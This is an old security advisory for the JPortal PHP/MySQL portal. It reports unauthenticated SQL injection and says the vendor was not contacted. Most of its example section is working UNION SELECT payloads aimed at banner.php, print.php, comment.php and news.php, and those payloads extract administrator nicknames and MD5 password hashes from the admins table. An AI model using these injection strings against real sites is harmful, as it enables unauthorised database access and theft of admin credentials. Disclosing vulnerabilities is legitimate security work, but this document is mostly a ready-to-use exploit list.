|
DATE:
=========
3/11/2005
AFFECTED PRODUCTS
=================
JPORTAL
all version
OVERVIEW
========
JpoRtaL is a simple portal system written in PHP using MySQL on
backend. It includes article posting (with comments, topics), links
manager (with section), download manager (with section), short news
manager, blocks and user managers. You can also change themes (now new
2 themes) and languages. Since 0.6 JpoRtaL use easy admin system with
edit and delete articles, blocks, links, etc. Available in English and
Czech.
Vulnerability:
========
1.Sql Injection
Overwiew:
========
1.
An unauthenticated attacker may execute arbitrary SQL statements on
the vulnerable system. This may compromise the integrity of your
database and expose sensitive information
Exemple:
========
1.go to http://[victim]/jportal/banner.php and try this:
' UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL from admins where '1=1
and then:
' UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL from admins where '1=1
After that, You gain login and password of administrator.
2.print.php?what=article&id=<article
id>%20AND%201=0%20UNION%20SELECT%20id,id,nick,pass,id,id,
id,id,id%20from%20admins%20LIMIT%201
3.
http://[adres]/comment.php?what=news&id=<news id>
and 1=0 union (select null, null, nick, null, null, null, null, null, null,
null, null, null from admins limit n,1)
got admin nick
http://[adres]/comment.php?what=news&id=<news id>
and 1=0 union (select null, null, pass, null, null, null, null, null, null,
null, null, null from admins limit n,1)
got md5 password
4.
print.php?what=article&id=<article id> AND 1=0 UNION SELECT
id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
news.php?id=<news
id>%20AND%200%20=%201%20UNION%20SELECT%20*,
%201,%201,%201,%201%20FROM%20admins%20--
print.php?what=article&id=<article
id>%20AND%201=0%20UNION%20SELECT%20id,id,nick,pass,id,id,
id,id,id%20from%20admins%20LIMIT%201
Solution:
=========
1. Venditor Not Contacted
|
